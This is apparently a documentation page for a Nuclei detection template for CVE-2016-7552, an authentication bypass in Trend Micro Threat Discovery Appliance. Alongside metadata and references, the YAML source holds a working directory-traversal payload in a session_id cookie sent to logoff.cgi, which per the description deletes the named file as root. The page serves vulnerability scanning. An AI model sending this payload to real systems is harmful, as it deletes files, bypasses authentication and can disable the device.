Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
ID: CVE-2016-7552
Severity: critical
Author: dwisiswant0
Tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro
Description
Section titled “Description”Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
YAML Source
Section titled “YAML Source”id: CVE-2016-7552
info: name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. impact: | Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance. remediation: | Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.96711 epss-percentile: 0.99651 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 vendor: trendmicro product: threat_discovery_appliance tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro
http: - method: GET path: - "{{BaseURL}}/cgi-bin/logoff.cgi"
headers: Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
matchers-condition: and matchers: - type: word part: body words: - "Memory map"
- type: status status: - 200# digest: 4a0a004730450221008b19cef38be5e8492645d6cfb16d4425974c8b3a7dcc5befeb27cc7605318a7c02200322c25329b6fde0979cbf23ce8ef7401d31a440bd09973e740c34c7a4bbcfb8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-7552.yaml"